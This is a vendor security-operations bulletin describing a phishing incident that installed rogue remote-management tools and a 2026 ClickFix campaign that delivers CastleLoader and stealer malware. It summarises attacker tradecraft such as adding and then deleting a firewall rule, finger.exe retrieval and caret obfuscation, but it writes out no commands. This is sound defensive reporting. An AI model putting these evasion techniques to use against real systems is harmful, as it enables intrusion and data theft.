Blackpoint SOC Threat Pulse: Week of June 29, 2026
In this week’s Threat Pulse, the Blackpoint Security Operations Center (SOC) breaks down a phishing attack where threat actors weaponized trusted remote management tools to quietly take over a device, hiding in plain sight inside the software organizations rely on for day-to-day business. The Adversary Pursuit Group dives into a trend the SOC has observed all year: ClickFix style attacks have accounted for more than 30% of all incidents in 2026, and the latest campaign shows attackers are not slowing down.
Featured Incident: When Good Software Goes Bad
What we’re seeing
- The Blackpoint SOC detected the use of ScreenConnect on a host; further investigation identified a phishing attack as the initial access vector.
- The threat actor lured a victim to download a backup software; the software created a new firewall rule to allow the installation of two ScreenConnect instances and RMM Agent on the host.
- The threat actor deleted the firewall rule after the RMM tools were installed, likely in an attempt to evade detection.
What the Blackpoint SOC did
- The Blackpoint SOC immediately isolated the host to prevent additional malicious activity and cut off the threat actor’s access to the device.
Why this matters
- RMM tools are frequently used to maintain persistent access to a victim device while blending in with normal IT activity. The deployment of several instances is likely an attempt to provide other options if one instance is detected and removed.
- Since these are legitimate tools, they are more difficult for traditional security tools to detect within the environment, this single device access could have led to a full system compromise, data theft, or the deployment of malware payloads.
BROC Weekly Snapshot
What changed. What didn’t. What matters.
| Incidents Observed >85↓ | Pre-Payload Disruptions 90%↓ | Pre-Ransom Interruptions N/A |
Campaign Statuses
| Fake CAPTCHA/ClickFix | ↓ | Ongoing | 40% |
| Rogue RMM | ↑ | Escalating | 27% |
| Trojanized Installers | ↑ | Ongoing | 5% |
| SSL VPN Compromise | ↓ | Ongoing | 1% |
Quick Take
The Blackpoint SOC has increasingly responded to incidents involving ClickFix-style initial access methods. Between 01 Jan and 25 Jun 2026, these incidents have accounted for more than 30% of the total incidents. This style of attack is designed to bypass basic user skepticism by mimicking standard web elements, making it particularly effective in mass-targeting scenarios.
The Blackpoint SOC has observed a spike in activity related to ClickFix-style attacks, which aligns with an ongoing campaign involving the deployment of a C-based CastleLoader and a Python-based CastleLoader variant. This campaign has been ongoing and peaked activity in early June 2026. The campaign has shown infrastructure rotation and consistent tradecraft; they have all included the use of finger.exe as the initial retrieval mechanism with the majority of them using caret (^) obfuscation in the command.
Figure 1: SOC-observed ClickFix incidents per month January-June 2026
Due to the widespread use of ClickFix as an initial access method, the Blackpoint SOC has identified several different malware variants as part of these incidents. The Blackpoint SOC has interrupted more than 75% of these incidents before any payload could be delivered and 100% of these before the attacker could complete their objective. The most common malware variants observed so far in 2026 include CastleLoader (14.3%), NetSupport RAT (6.1%), and Vidar Stealer (3.2%).
Analyst Note: ClickFix attacks can escalate from a single click to serious business risk and can result in potential downtime, loss of information, and more. Campaigns relying on ClickFix attacks have proven to be scalable and have continued to evolve and increase in adoption. The Blackpoint SOC has successfully identified these incidents each time; this campaign highlights why rapid detection and response at the endpoint level is critical; without it, these incidents could have led to full system compromise, stolen data, and/or the deployment of second stage malware, including ransomware.
DATE PUBLISHEDJune 30, 2026
AUTHORBlackpoint Cyber
SHARE ON
2026 Annual Threat Report
What actually worked for attackers in 2025.
Most attackers aren’t breaking in
They’re logging in
Explore the real patterns behind modern intrusions in the 2026 Annual Threat Report